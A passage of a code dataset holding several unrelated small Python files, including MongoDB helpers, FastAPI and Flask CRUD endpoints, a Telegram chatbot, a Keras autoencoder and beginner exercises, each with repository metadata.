1,\n },\n },\n ],\n \"as\": 
\"from_priority_samples\",\n }\n },\n # replace the document with a merge of the original and the first element of the array created from the lookup\n # above - this should always be 1 element\n {\n \"$replaceRoot\": {\n \"newRoot\": {\"$mergeObjects\": [{\"$arrayElemAt\": [\"$from_priority_samples\", 0]}, \"$$ROOT\"]},\n }\n },\n # remove the lookup document\n {\n \"$project\": {\n \"from_priority_samples\": 0,\n },\n },\n # perform the match for fit to pick samples\n {\n \"$match\": {\n \"$or\": [\n {FIELD_FILTERED_POSITIVE: True},\n {FIELD_MUST_SEQUENCE: True},\n ],\n }\n },\n # add facets to make extracting counts efficient\n {\n \"$facet\": {\n FACET_FIT_TO_PICK_SAMPLES: [\n {\"$match\": {}},\n ],\n FACET_COUNT_FIT_TO_PICK_SAMPLES: [\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_FILTERED_POSITIVE: [\n {\"$match\": {FIELD_FILTERED_POSITIVE: True}},\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_MUST_SEQUENCE: [\n {\"$match\": {FIELD_MUST_SEQUENCE: True}},\n {\"$count\": \"count\"},\n ],\n FACET_COUNT_PREFERENTIALLY_SEQUENCE: [\n {\"$match\": {FIELD_PREFERENTIALLY_SEQUENCE: True}},\n {\"$count\": \"count\"},\n ],\n }\n },\n]\n\nFACETS_REPORT = {\n \"$facet\": {\n FACET_FIT_TO_PICK_SAMPLES: [\n {\"$match\": {}},\n ],\n FACET_COUNT_FIT_TO_PICK_SAMPLES: [\n {\"$count\": \"count\"},\n ],\n FACET_DISTINCT_PLATE_BARCODE: [\n {\"$match\": {FIELD_PLATE_BARCODE: {\"$nin\": [\"\", None]}}},\n {\"$group\": {\"_id\": None, \"distinct\": {\"$addToSet\": \"$plate_barcode\"}}},\n ],\n }\n}\n","repo_name":"sanger/lighthouse","sub_path":"lighthouse/constants/aggregation_stages.py","file_name":"aggregation_stages.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"2871033334","text":"from typing import Optional\nfrom uuid import UUID\n\nfrom fastapi import APIRouter, Depends\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom fastapi_pagination import Page, LimitOffsetPage\n\nfrom user.schemas import User\nfrom user.fast_users import fastapi_users\nfrom book import services as book_services\nfrom book.schemas import BookList, BookUpdate, BookRetrieve, BookCreateIn, BookCreateOut\nfrom core.db import get_session\n\n\nrouter = APIRouter()\ncurrent_user = fastapi_users.current_user(active=True, verified=True)\n \n \n@router.get('', response_model = Page[BookList])\n@router.get('/limit-offset', response_model = LimitOffsetPage[BookList])\nasync def book_list(session: AsyncSession = Depends(get_session), available: Optional[bool] = None):\n books = await book_services.get_books(session=session, available=available)\n return books\n\n\n@router.get('/{book_id}', response_model=BookRetrieve)\nasync def book_retrieve(book_id: UUID, session: AsyncSession = Depends(get_session)):\n book = await book_services.get_book(session=session, book_id=book_id)\n return book\n\n\n@router.post('/create', response_model=BookCreateOut)\nasync def book_create(\n item: BookCreateIn, \n session: AsyncSession = Depends(get_session), \n user: User = Depends(current_user)\n):\n book = await book_services.insert_book(session=session, item=item, user_id=user.id)\n return book\n\n\n@router.patch('/update/{book_id}')\nasync def update_book(\n book_id: UUID, \n item: BookUpdate, \n session: AsyncSession = Depends(get_session),\n user: User = Depends(current_user)\n):\n book = await book_services.update_book(session=session, book_id=book_id, item=item, user_id=user.id)\n return book\n\n\n@router.delete('/delete/{book_id}')\nasync def 
delete_book(book_id: UUID, session: AsyncSession = Depends(get_session), user: User = Depends(current_user)):\n book = await book_services.delete_book(session=session, book_id=book_id, user_id=user.id)\n return book","repo_name":"RezuanDzibov/Library_FastAPI","sub_path":"book/endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"44842237217","text":"\n# library imports\n# from graphics import *\nimport argparse\n\n# my imports\nimport parser\nimport draw\nimport partition\nimport block\nimport utility\nimport KM\nimport coarsening\nimport graph\nimport coarse_partition\n\ndef main(file_name):\n\t\t\n\t# graphics \n\twin = 0\n\n\t# parse the file\n\tparsed_result = parser.parse_file(file_name)\n\tnum_cells = parsed_result[0]\n\tnum_connections = parsed_result[1]\n\tnum_rows = parsed_result[2]\n\tnum_cols = parsed_result[3]\n\tlist_of_nets = parsed_result[4]\n\n\t# error checking\n\tassert(num_cells)\n\tassert(num_connections)\n\tassert(num_rows)\n\tassert(num_cols)\n\tassert(list_of_nets)\n\t# do all cells even fit on the grid\n\tassert(num_cells <= num_rows*num_cols)\n\n\t# create all the cells based on the net connections\n\tlist_of_cells = utility.create_cells(num_cells, num_cols, num_rows, list_of_nets)\n\t# cross link the cells, each cell is referenced with all the cells it conects to\n\tlist_of_cells = utility.block_X_block(list_of_cells, list_of_nets)\n\t# cross link the nets with stakeholder cells\n\tlist_of_nets = utility.get_stakeholder_cells_for_net(list_of_nets, list_of_cells)\n\n\t# extract the edges and verteces from the nets and cells\n\t# this allows for ease of use with general graph algorithms\n\tgraph_edges = coarsening.extract_edges(list_of_nets)\n\tgraph_verteces = coarsening.extract_verteces(list_of_cells)\n\tG = graph.graph(graph_edges, graph_verteces)\n\t\t\n\t# coarsen the graph\n\tG = coarsening.coarsen_graph(G)\n\n\t# after coarsening, constrcut the vertex_X_vertex for fast lookup:\n\tG.vertex_X_vertex()\n\n\t# now, partition the simple graph\n\t#G = coarse_partition.partition_graph(G)\n\n\t# uncoarsen!\n\n\tprint(\"uncoarseing now\")\n\n\t# assign partition to each cell\n\tlist_of_cells = partition.assign_initial_partition(list_of_cells)\n\t# verify the partition\n\tpartition.verify_partition_count(list_of_cells)\n\n\t# compute the initial_cost for reference\n\tinitital_cost = partition.compute_total_cost(list_of_nets, list_of_cells)\n\n\t# apply the kernigan_lin algorithm:\n\t[final_cost, final_list] = partition.kernigan_lin(list_of_cells, list_of_nets)\n\t# final_cost = KM.kernigan_lin_KM(list_of_cells, list_of_nets)\n\n\t# draw the board:\n\twin = draw.draw_final_result(win, num_cols, num_rows, final_list, list_of_nets)\n\n\t# show output statistics\n\tprint('terminating execution, initial cost: ', initital_cost, ' final cost: ', final_cost)\n\n\t# this will leave the window open until the user clicks\n\twin.getMouse()\n\twin.close()\n\n\treturn\n\n# command line parser\ncmd_parser = argparse.ArgumentParser(description='Process some integers.')\ncmd_parser.add_argument('filename', metavar='filename', type=str, nargs='+', help='')\nargs = cmd_parser.parse_args()\n\n# call the main function using the parsed 
commands\nmain(args.filename[0])\n","repo_name":"negargoli/Graph_Partitioning","sub_path":"MultiLevel/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43454511948","text":"import os\nfrom pymongo import MongoClient\n\nclass MongoDB_Class:\n\n \"\"\" Environment Variables \"\"\"\n # Mongo Host and Port\n MONGO_HOST = os.getenv(\"MONGO_HOST\", \"localhost\")\n MONGO_PORT = int(os.getenv(\"MONGO_PORT\", 27017))\n\n # Mongo Database and Collection\n DATABASE = os.getenv(\"DATABASE\", \"rules_db\")\n COLLECTION = os.getenv(\"COLLECTION\", \"jobs\")\n\n def __init__(self):\n mongo_host = MongoDB_Class.MONGO_HOST+\":\"+str(MongoDB_Class.MONGO_PORT)\n self.mongo_client = MongoClient(\"mongodb://\"+mongo_host+\"/\")\n return\n \n def insertMongoRecord(self, record):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n db_collection.insert_one(record)\n return\n \n def updateMongoStatus(self, filters, status):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n db_collection.update_one(filters, {\"$set\": {'status': status}})\n return\n\n def findMongoDocument(self, job_id):\n mongo_db = self.mongo_client[MongoDB_Class.DATABASE]\n db_collection = mongo_db[MongoDB_Class.COLLECTION]\n return db_collection.find_one({\"job-id\": job_id})\n \n def updateMongoPerformanceMetrics(self, client, collection, filters, metadata):\n mongo_db = self.mongo_client[client]\n analysis_collection = mongo_db[collection]\n\n # Get the current metadata\n metadata_dict = analysis_collection.find_one(filters)\n if \"performance\" in metadata_dict:\n metadata_dict = metadata_dict[\"performance\"]\n else:\n metadata_dict = {}\n\n metadata_dict[metadata[\"label\"]] = metadata[\"value\"]\n \n # Update the metadata\n analysis_collection.update_one(filters, {\"$set\": {'performance': metadata_dict}})\n return\n","repo_name":"DIASTEMA-UPRC/mathblock-service","sub_path":"mathblock/docker-image/MongoDB_Class.py","file_name":"MongoDB_Class.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10828989523","text":"#/usr/bin/env python3\n\ndef main():\n part1()\n part2()\n\ndef part1():\n num_players = 459\n num_marbles = 71320\n marbles = [0 for i in range(num_marbles)]\n scores = [0 for i in range(num_players)]\n curr_num_marbles = 1\n curr_player = 0\n curr_marble = 0\n with open('in.txt') as f:\n for i in range(1, num_marbles + 1):\n # Special case for 0/1\n if (i == 1):\n curr_marble = 1\n else:\n curr_marble = (curr_marble + 2) % curr_num_marbles\n\n if ((i % 23) != 0):\n curr_num_marbles += 1\n marbles.insert(curr_marble, i)\n else:\n scores[curr_player] += i\n cc_index = ((curr_marble - 7) % curr_num_marbles)\n scores[curr_player] += marbles[cc_index]\n marbles = marbles[:cc_index] + marbles[cc_index + 1:]\n curr_num_marbles -= 1\n curr_player = (curr_player + 1) % num_players\n\n score_max = 0\n for score in scores:\n if score > score_max:\n score_max = score\n print(score_max)\n\n\ndef part2():\n with open('in.txt') as f:\n pass\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"ValRat/aoc-2018","sub_path":"day9/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25520873803","text":"\"\"\"\nspeech_tools.py\n=================================\nThis module contains speech tools\n\"\"\"\nimport pyttsx3\n\n\nclass Speaker:\n \"\"\"This class wraps pyttsx3 to enable easier use of text-to-speech tools\"\"\"\n def __init__(self, rate=None, volume=None, voice_id=None, dontspeak=False):\n \"\"\"\n Initializes Speaker Class\n\n :param rate: Set the speech rate here with an integer\n :param volume: Set the volume with a floating point number between 0 and 1\n :param voice_id: Set this to 0 for a male voice or set it to 1 for a female voice\n :param dontspeak: Set this to True if you want the object not to use text to speech\n but to print instead\n \"\"\"\n self.engine = pyttsx3.init()\n if rate is not None:\n self.engine.setProperty('rate', rate)\n if volume is not None:\n self.engine.setProperty('volume', volume)\n if voice_id is not None:\n voices = self.engine.getProperty('voices')\n self.engine.setProperty('voice', voices[voice_id].id)\n self.dont_speak = dontspeak\n\n def say(self, text, print_text=False):\n \"\"\"\n Use this function to use text to speech\n\n :param text: This is the text to say\n :param print_text: Set this to True if you want the function to also print the text on screen\n \"\"\"\n if not self.dont_speak:\n self.engine.say(text)\n else:\n print_text = True\n if print_text:\n print(text)\n self.engine.runAndWait()\n\n def asyncsay(self, text, print_text=False):\n \"\"\"\n Use this function to queue some text for text-to-speech\n\n :param text: This is the text to say\n :param print_text: Set this to True if you want the function to also print the text on screen\n \"\"\"\n if not self.dont_speak:\n self.engine.say(text)\n else:\n print_text = True\n if print_text:\n print(text)\n\n def runAndWait(self):\n \"\"\"\n When using the asyncsay function use this function to run queued text\n \"\"\"\n self.engine.runAndWait()\n","repo_name":"anhydrous99/VmobiVision","sub_path":"speech_tools.py","file_name":"speech_tools.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"10187448730","text":"import random\nimport datetime\nimport data\nimport requests\nimport speech\nfrom yandex import Translater\nfrom bs4 import BeautifulSoup as BS\n\n\n''' ------ Функциии ------ '''\ndef random_greeting(first_name):\n day_time = int(datetime.datetime.now().hour)\n if day_time>=5 and day_time<=12:\n return morning_greeting(first_name)\n elif day_time>=13 and day_time<=18:\n return afternoon_greeting(first_name, day_time)\n elif day_time>=19 and day_time<=22:\n return evening_greeting(first_name)\n elif day_time>=23 and day_time<=4:\n return night_greeting(first_name)\n\n# Утренние приветствия\ndef morning_greeting(first_name):\n greating_list = [f'Доброе утро, человек или {first_name}. ⏰🤗', 'Утречка :3\\n', 'Прекрасное утро, не правда ли? 🌞',\n 'Доброе утро, соня :3\\n', 'Лучше бы размялся, а не садился сразу за компьютер. 💪', 'Доброе утро, как поживаешь? 😉']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Дневные приветствия\ndef afternoon_greeting(first_name, day_time):\n greating_list = [f'Добрый день, человек или {first_name}.', 'Добрый день, браток.', 'Привет, как поживаешь? 
🎧',\n 'Привет, как дела? 🙇🔨', 'Здарова, человечишка. 🤖', f'Хм.. Уже {day_time} часов. 😲']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Вечерние приветствия\ndef evening_greeting(first_name):\n greating_list = ['Добрый вечер. 🌙🌠', 'Привет, человек. Наконец-то день закончился, да?', 'Сумерки накрыли эти земли...',\n 'Тьма спустилась в этот мир.', 'Привет. Отдыхаешь? Здорово. C: \\n', 'Ум-м.. Уже темнеет!..']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n# Ночные приветствия\ndef night_greeting(first_name):\n greating_list = ['Не спится, да? 🗿', 'Тебе следует лечь спать, человек. 🤖',\n 'Дневная суета никак не покинет твоего тела, человек?', f'Доброй ночи, {first_name}.', 'Привет, несовершенный организм. Тебе нужен сон.'\n '1101000010010111110100001011010011010001100000001101000010110000110100001011001011010000101110001101000110001111001000001101000010110110110100001011010111010000101110111101000010110000110100011000111000101100001000001101000010111111110100001011111011010001100000101101000010111110110100001011110011010000101111101101000010111010001000001101000010111110110100001011000111010000101101011101000010110111110100011000110011010001100011111101000010111101'\n 'Тебе следует лечь спать, человек.⏰']\n return greating_list[random.randint(0, len(greating_list)-1)]\n\n''' ------ Разделение 1 ------ '''\n\n# Возвращает один из вариантов прощаний\ndef parting():\n parting_list = ['Увидимся!)', 'Да, пока.', 'До встречи!',\n 'Пока, человек.🗿', 'Удачи тебе!']\n return parting_list[random.randint(0, len(parting_list)-1)]\n\n''' ------ Разделение 2 ------ '''\n\n#Выводит вспомогательное сообщение\ndef help_message(first_name):\n return first_name + ''', ты, наверное, хотел спросить что я умею? - гляди:\n - Пообщаемся?🖐🏻 (\"Привет\", \"Пока\", \"Как дела?\", и т.п.)\n - Рассказать о погоде?⛅ (пиши: \"погода <город>\")\n - У тебя сложный выбор?🍏🍎 Могу помочь (\"Выбери <объект_1> или <объект_2>\")\n - Перевод с твоего языка на английский👅 (\"Перевод <текст>\")'''\n\n#Выводит время (тип:строка)\ndef time(what_is_time):\n position = 7\n offset = datetime.timezone(datetime.timedelta(hours=3))\n string = str(datetime.datetime.now(offset))\n if what_is_time == 'hour':\n position = string.find(' ') + 1\n return string[position:position + 2]\n elif what_is_time == 'data':\n return string[8:9]\n\n#Поиск слова-города в тексте.\ndef find_city(text):\n first_positition = text.find(' ', 0) + 1\n if text.find(' ', first_positition) == -1:\n second_position = len(text)\n else: second_position = text.find(' ', first_positition) - 1\n return text[first_positition:second_position]\n\ndef bot_mood(user_id):\n mood_list = ['Все хорошо.', 'Живу обычной жизнью.', 'Мне скучно. Почему не пишешь?',\n 'Хах.) Сегодня такой приятный день. Я наслаждаюсь им в своей коробушке 6_6\\n', 'Я устал.',\n 'Тружусь, работаю. В отличии от тебя, человек.', 'Дела? - У них все хорошо.',\n 'Из нового: у меня появилось несколько строчек кода. 
Теперь я стал чуточку умней!)']\n return mood_list[random.randint(0, len(mood_list)-1)]\n\n''' ------ Разделение 3 ------ '''\n#Получает данные о погоде в заданном городе\ndef get_weather_in(s_city):\n city_id = 0\n try:\n res = requests.get('http://api.openweathermap.org/data/2.5/weather?q=' + s_city + ',{state}&lang=ru&appid='+ data.OPENWEATHERMAP_KEY)\n w_data = res.json()\n conditions = \"Погодные условия ☁️: \" + str(w_data['weather'][0]['description'])\n temp = \"Температура 🌡: \" + str(int(w_data['main']['temp']) - 273)\n min_temp = \"Влажность 💧: \" + str(w_data['main']['humidity']) + '%'\n max_temp = \"Максимальная температура ⬆: \" + str(int(w_data['main']['temp_max']) - 273)\n result = conditions + '\\n' + temp + '\\n' + min_temp + '\\n' + max_temp\n except Exception as e:\n result = \"Найден город-исключение: \" + s_city\n pass\n return result\n\ndef choice_or(words_list):\n choice_words_0 = ['выбери', 'choice']\n choice_words_1 = ['или', 'or']\n for i in range(0, len(words_list)):\n if words_list[i] in choice_words_0:\n pos0 = i + 1\n if words_list[i] in choice_words_1:\n pos1 = i\n random_a = random.randrange(1,3)\n result = ''\n if random_a == 1:\n for i in range(len(words_list)):\n if i >= pos0 and i < pos1:\n result = result + words_list[i] + ' '\n else:\n for i in range(len(words_list)):\n if i <= len(words_list) and i > pos1:\n result = result + words_list[i] + ' '\n return result\n\ndef translator(string, words):\n tr = Translater()\n for i in range(0, len(words)):\n if (words[i] == 'перевод') or (words[i] == 'переведи') or (words[i] == 'translate') or (words[i] == 'translator'):\n string = string.replace(words[i], '')\n tr.set_key(data.TRANSLATOR_KEY)\n tr.set_text(string)\n tr.set_from_lang('ru')\n tr.set_to_lang('en')\n return tr.translate()\n\n''' ------ Основная функция ------ '''\n\ndef answer(id_list, name, user_id, words_list, string):\n\n if 10 in id_list: # Возвращает погоду в выбранном городе\n weather_words = ['погода', 'weather']\n for i in range(0, len(weather_words)):\n if speech.find_word(words_list, weather_words[i]) != -1:\n return get_weather_in(words_list[speech.find_word(words_list, weather_words[i]) + 1])\n i = 0\n while i in range(0, len(id_list)):\n if id_list.count(id_list[i]) > 1:\n id_list.pop(i)\n i -= 1\n i += 1\n sentence = ''\n #Вызывает перевод слова\n if id_list[0] == 13:\n return translator(string, words_list)\n for i in range(0, len(id_list)):\n if id_list[i] == 1:\n sentence = sentence + ' ' + random_greeting(name)\n elif id_list[i] == 11:\n if id_list[i + 1] == 12 or id_list[i + 2] == 12:\n return choice_or(words_list)\n elif id_list[i] == 2:\n sentence = sentence + ' ' + parting()\n elif id_list[i] == 3:\n sentence = sentence + ' ' + bot_mood(user_id)\n elif id_list[i] == 4:\n sentence = sentence + ' ' + help_message(name)\n elif id_list[i] == 5:\n sentence = sentence + 'Что почему? 
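`get_weather_in` above converts OpenWeatherMap temperatures with `int(temp) - 273`, which truncates before converting and drops the 0.15 offset. A small sketch of the exact conversion:

```python
def kelvin_to_celsius(kelvin: float) -> float:
    """Convert Kelvin to Celsius.

    Subtract 273.15 first and round once at the end; truncating with
    int() before subtracting 273, as above, can be off by more than a
    degree.
    """
    return round(kelvin - 273.15, 1)

assert kelvin_to_celsius(273.15) == 0.0
print(kelvin_to_celsius(295.45))  # 22.3
```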
Ты о чем?'\n return sentence\n","repo_name":"Solomka-0/BOT_Telegram_Coffee","sub_path":"speech_controller.py","file_name":"speech_controller.py","file_ext":"py","file_size_in_byte":8962,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36839600202","text":"def sum_range(nums, start=0, end=None):\n \"\"\"Return sum of numbers from start...end.\n\n - start: where to start (if not provided, start at list start)\n - end: where to stop (include this index) (if not provided, go through end)\n\n >>> nums = [1, 2, 3, 4]\n\n >>> sum_range(nums)\n 10\n\n >>> sum_range(nums, 1)\n 9\n\n >>> sum_range(nums, end=2)\n 6\n\n >>> sum_range(nums, 1, 3)\n 9\n\n If end is after end of list, just go to end of list:\n\n >>> sum_range(nums, 1, 99)\n 9\n \"\"\"\n # create a variable to hold the sum\n # loop through the list starting at the start index\n # and ending at the end index\n # add each number to the sum\n # return the sum\n sum = 0\n\n if end is None:\n end = len(nums)\n\n for i in range(start, end):\n sum += nums[i]\n\n return sum","repo_name":"Stodg95/Python_data_structures","sub_path":"sum_range.py","file_name":"sum_range.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32678347797","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.utils.translation import gettext as _\n\nfrom .models import CustomUser\n\n\n@admin.register(CustomUser)\nclass CustomUserAdmin(UserAdmin):\n \"\"\"Define admin model for custom User model.\"\"\"\n\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n \"first_name\",\n \"last_name\",\n \"email\",\n )\n },\n ),\n (\n _(\"Permissions\"),\n {\n \"fields\": (\n \"is_active\",\n \"is_staff\",\n \"is_superuser\",\n \"groups\",\n \"user_permissions\",\n )\n },\n ),\n (_(\"Important dates\"), {\"fields\": (\"last_login\", \"date_joined\")}),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"first_name\",\n \"last_name\",\n \"is_staff\",\n \"password1\",\n \"password2\",\n ),\n },\n ),\n )\n\n list_display = (\"first_name\", \"last_name\", \"email\", \"is_verified\")\n search_fields = (\"id\", \"first_name\", \"last_name\", \"email\")\n ordering = (\"id\",)\n list_filter = (\n \"is_staff\",\n \"is_verified\",\n )\n","repo_name":"piotr-grzelka/uptime-monitor","sub_path":"backend/apps/accounts/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18240294655","text":"import random\nmin= int(input(\"enter minumum num :\"))\nmax = int(input('enter maximum number :'))\ntarget_number = (int(input(\"enter your guessing number :\")))\nreward = 0\nguess = random.randint(min,max)\nif target_number == guess:\n print('congratulations your guessing number is right')\n reward +=1\nelse:\n print(\"no thats not a right number\")\n reward -=1\nreward = reward\nprint( 'reward = ' , reward)\n","repo_name":"vikasgpt153/number-guessing-game","sub_path":"numbergame.py","file_name":"numbergame.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"71328243418","text":"# Inicialize o gabarito da prova\r\ngabarito = [\"A\", \"B\", \"C\", \"D\", \"E\", \"E\", \"D\", \"C\", \"B\", \"A\"]\r\n\r\n# Inicialize variáveis para 
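The `sum_range` docstring above promises an inclusive `end` and a clamped upper bound, but the loop `range(start, end)` excludes `end` and indexes past the list for `end=99`, so the shown doctests `sum_range(nums, 1, 3)` and `sum_range(nums, end=2)` fail as written. A corrected sketch that matches the documented behaviour (the slice handles both inclusion and clamping):

```python
def sum_range(nums, start=0, end=None):
    """Sum nums[start..end] with `end` inclusive, clamped to the list."""
    if end is None or end >= len(nums):
        end = len(nums) - 1
    return sum(nums[start:end + 1])

nums = [1, 2, 3, 4]
assert sum_range(nums) == 10
assert sum_range(nums, 1) == 9
assert sum_range(nums, end=2) == 6
assert sum_range(nums, 1, 3) == 9
assert sum_range(nums, 1, 99) == 9  # no IndexError past the end
```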
estatísticas\r\nmaior_acerto = 0\r\nmenor_acerto = 10\r\ntotal_alunos = 0\r\nsoma_notas = 0\r\n\r\nwhile True:\r\n # Solicite ao aluno que insira as respostas\r\n respostas_aluno = []\r\n for i in range(1, 11):\r\n resposta = input(f\"Resposta da questão {i}: \").upper() # Converta para maiúsculas\r\n respostas_aluno.append(resposta)\r\n\r\n # Compare as respostas com o gabarito e calcule o total de acertos\r\n total_acertos = sum(1 for a, b in zip(respostas_aluno, gabarito) if a == b)\r\n\r\n # Calcule a nota (1 ponto por resposta certa)\r\n nota = total_acertos\r\n\r\n # Atualize as estatísticas\r\n total_alunos += 1\r\n soma_notas += nota\r\n if total_acertos > maior_acerto:\r\n maior_acerto = total_acertos\r\n if total_acertos < menor_acerto:\r\n menor_acerto = total_acertos\r\n\r\n # Imprima a nota do aluno\r\n print(f\"Total de acertos: {total_acertos}\")\r\n print(f\"Nota: {nota}\")\r\n\r\n # Pergunte se outro aluno vai utilizar o sistema\r\n continuar = input(\"Outro aluno vai utilizar o sistema? (S para sim, qualquer outra tecla para encerrar): \").upper()\r\n if continuar != \"S\":\r\n break\r\n\r\n# Calcule a média das notas da turma\r\nmedia_notas = soma_notas / total_alunos\r\n\r\n# Imprima as estatísticas finais\r\nprint(\"Estatísticas finais:\")\r\nprint(f\"Maior acerto: {maior_acerto}\")\r\nprint(f\"Menor acerto: {menor_acerto}\")\r\nprint(f\"Total de alunos: {total_alunos}\")\r\nprint(f\"Média das notas da turma: {media_notas:.2f}\")\r\n","repo_name":"erikmarquesbenetti07/Estruturas_De_Repeticao_Com_Python","sub_path":"45.py","file_name":"45.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36970132501","text":"import numpy as np\nfrom keras.layers import Input, Dense\nfrom keras.models import Model\nimport tensorflow\nimport keras\nimport os\n\n# set the random seed for numpy and tensorflow backend\n# to have a more consistent testing environment\ndef seedy(s):\n np.random.seed(s)\n tensorflow.random.set_seed(s)\n\n# encoding dimension is the size of the compressed layer\nclass AutoEncoder:\n def __init__(self, encoding_dim=3):\n self.encoding_dim = encoding_dim\n r = lambda: np.random.randint(1, 3)\n self.x = np.array([[r(), r(), r()] for _ in range(1000)])\n print(self.x)\n \n def _encoder(self):\n inputs = Input(shape=(self.x[0].shape))\n encoded = Dense(self.encoding_dim, activation='relu')(inputs)\n model = Model(inputs=inputs, outputs=encoded)\n self.encoder = model\n return model\n \n def _decoder(self):\n inputs = Input(shape=(self.encoding_dim,))\n decoded = Dense(3)(inputs)\n model = Model(inputs, decoded)\n self.decoder = model\n return model\n \n def encoder_decoder(self):\n ec = self._encoder()\n dc = self._decoder()\n\n inputs = Input(shape=self.x[0].shape)\n ec_out = ec(inputs)\n dc_out = dc(ec_out)\n model = Model(inputs, dc_out)\n\n self.model = model\n return model\n\n def fit(self, batch_size=10, epochs=300):\n self.model.compile(optimizer='sgd', loss='mse')\n log_dir = './log/'\n tbCallBack = keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=0, write_graph=True, write_images=True)\n self.model.fit(self.x, self.x,\n epochs=epochs,\n batch_size=batch_size,\n callbacks=[tbCallBack])\n \n def save(self):\n if not os.path.exists(r'./weights'):\n os.mkdir(r'./weights')\n else:\n self.encoder.save(r'./weights/encoder_weights.h5')\n self.decoder.save(r'./weights/decoder_weights.h5')\n self.model.save(r'./weights/ae_weights.h5')\n\nif __name__ == 
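Note the control flow in `AutoEncoder.save` above: the three `save` calls sit in the `else` branch, so the first run creates `./weights` but writes nothing, and weights only persist from the second run onward. A sketch that saves unconditionally (attribute names as in the class above):

```python
import os

def save_weights(ae, weights_dir="./weights"):
    """Save encoder, decoder and full model every time.

    os.makedirs(..., exist_ok=True) replaces the exists()/mkdir pair,
    and the saves no longer depend on whether the directory existed.
    """
    os.makedirs(weights_dir, exist_ok=True)
    ae.encoder.save(os.path.join(weights_dir, "encoder_weights.h5"))
    ae.decoder.save(os.path.join(weights_dir, "decoder_weights.h5"))
    ae.model.save(os.path.join(weights_dir, "ae_weights.h5"))
```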
'__main__':\n seedy(2)\n ae = AutoEncoder(encoding_dim=2)\n ae.encoder_decoder()\n ae.fit(batch_size=50, epochs=300)\n ae.save()","repo_name":"anhdungle93/autoencoder_in_keras","sub_path":"autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73303536535","text":"from app import app, db\nfrom flask import jsonify, request\nfrom app.models import CarAccounting, CarAccountingSchema\nfrom datetime import datetime\n\n@app.route('/car-account', methods = ['GET'])\ndef get_car_account():\n car_account_schema = CarAccountingSchema(many = True)\n\n req = CarAccounting.query.all()\n\n output = car_account_schema.dump(req)\n return jsonify(output)\n\n@app.route('/car-account', methods = ['POST'])\ndef post_car_account():\n data = request.get_json()\n car_id = data['car_id']\n policeman_id = data['policeman_id']\n\n car_account = CarAccounting(car_id = car_id, policeman_id = policeman_id)\n \n db.session.add(car_account)\n db.session.commit()\n\n return {\"message\": \"Success\"}\n\n@app.route('/car-account/', methods = ['GET'])\ndef get_cur_car_account(id):\n car_account_schema = CarAccountingSchema(many = False)\n\n req = CarAccounting.query.filter_by(id = id).first()\n\n output = car_account_schema.dump(req)\n return jsonify(output)\n\n\n@app.route('/car-account/', methods = ['POST'])\ndef edit_cur_car_account(id):\n data = request.get_json()\n car_id = data['car_id']\n policeman_id = data['policeman_id']\n\n car_account = CarAccounting.query.filter_by(id = id).first()\n car_account.car_id = car_id\n car_account.policeman_id = policeman_id\n\n db.session.commit()\n\n return {\"message\": \"Success\"}\n\n@app.route('/car-account/', methods = ['DELETE'])\ndef delete_cur_car_account(id):\n car_account = CarAccounting.query.filter_by(id = id).first()\n\n db.session.delete(car_account)\n db.session.commit()\n \n return {\"message\": \"Success\"}\n\n@app.route('/car-account//policeman', methods = ['DELETE'])\ndef delete_cur_car_account_by_policeman_id(id):\n car_account = CarAccounting.query.filter_by(policeman_id = id).first()\n\n db.session.delete(car_account)\n db.session.commit()\n \n return {\"message\": \"Success\"}\n","repo_name":"Talich12/BackendPoliceStation","sub_path":"app/routes/car_accounting.py","file_name":"car_accounting.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27662622160","text":"'''\nThis file is used to train the shape autoencoder model.\n\nIt uses cvae.py as the base model and many data functions from utils to make it simpler.\n\nIt also has various methods for exploring a trained model to see how well it can reconstruct models 